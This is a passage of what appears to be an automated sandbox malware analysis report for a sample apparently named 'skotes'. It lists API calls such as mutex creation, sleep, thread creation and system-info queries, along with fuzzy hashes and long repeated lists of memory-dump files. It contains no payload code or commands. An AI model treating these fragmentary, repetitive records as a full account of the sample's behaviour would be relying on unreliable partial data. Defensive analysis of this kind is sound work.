                                                          • Sleep.KERNELBASE(00000064,?), ref: 00BEA963
                                                          • CreateMutexA.KERNELBASE(00000000,00000000,00C43254), ref: 00BEA981
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                                                          • Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_be0000_skotes.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AttributesCreateFileMutexSleep
                                                          • String ID:
                                                          • API String ID: 396266464-0
                                                          • Opcode ID: 89529149afc7099fe8e2a9db4a5042ac5e890afe8e7cd94cbc3d333ae1a6a383
                                                          • Instruction ID: cf82cee474989ff8bafdd521f4eff2edffd99701a091829b992bb07eed23884e
                                                          • Opcode Fuzzy Hash: 89529149afc7099fe8e2a9db4a5042ac5e890afe8e7cd94cbc3d333ae1a6a383
                                                          • Instruction Fuzzy Hash: 59314A71B00184DBEB18DB79CDC9B6DBBEAEFC6310F204298E014972D2D775A9858712
                                                          APIs
                                                          • Sleep.KERNELBASE(00000064,?), ref: 00BEA963
                                                          • CreateMutexA.KERNELBASE(00000000,00000000,00C43254), ref: 00BEA981
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                                                          • Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_be0000_skotes.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateMutexSleep
                                                          • String ID:
                                                          • API String ID: 1464230837-0
                                                          • Opcode ID: 5e63cf968ad933a08624f0a160c92fa4810296f69e0158a5c57d2b98c4bcd60f
                                                          • Instruction ID: a6e46b67160d1c5dca39718bca42a810dc5bd8ee4fdceb1bcb1ce72906b3b1a8
                                                          • Opcode Fuzzy Hash: 5e63cf968ad933a08624f0a160c92fa4810296f69e0158a5c57d2b98c4bcd60f
                                                          • Instruction Fuzzy Hash: 5AE086683A8344D6FA20B26A688DB2D7299DFD6B10F310414E604C6092C6F055848537
                                                          APIs
                                                          • CreateThread.KERNELBASE(00000000,00000000,Function_00016C70,00000000,00000000,00000000), ref: 00BF6D11
                                                          • Sleep.KERNELBASE(00007530), ref: 00BF6D25
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                                                          • Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_be0000_skotes.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateSleepThread
                                                          • String ID:
                                                          • API String ID: 4202482776-0
                                                          • Opcode ID: 9c21508f83b0d2444f5ca2c84198c4cd05fac05349077c440c8d39d1150b60dd
                                                          • Instruction ID: 1cb4ee9533058f8797712816bac2a75f9356ffa5a9788f6365ddedec4790a2c6
                                                          • Opcode Fuzzy Hash: 9c21508f83b0d2444f5ca2c84198c4cd05fac05349077c440c8d39d1150b60dd
                                                          • Instruction Fuzzy Hash: 92D08C357E0318B6F12007202C0BF3AAF90DB0AF01F350880B7483F0E0C2E030044B98
                                                          APIs
                                                          • GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00BE8524
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                                                          • Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_be0000_skotes.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InfoNativeSystem
                                                          • String ID:
                                                          • API String ID: 1721193555-0
                                                          • Opcode ID: ec14f34b6ddf5278b452c3b41b35a4b5c45d0024e2e04571552a943a45e2a483
                                                          • Instruction ID: 812207a2c7180782f69257f7730e0b67186f169839060e1c90b85b998561304d
                                                          • Opcode Fuzzy Hash: ec14f34b6ddf5278b452c3b41b35a4b5c45d0024e2e04571552a943a45e2a483
                                                          • Instruction Fuzzy Hash: 5651F670D106989BDB24EB69CD89BEDB7F5EB45310F5042E8E409A73C1EF349E848B91
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                                                          • Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
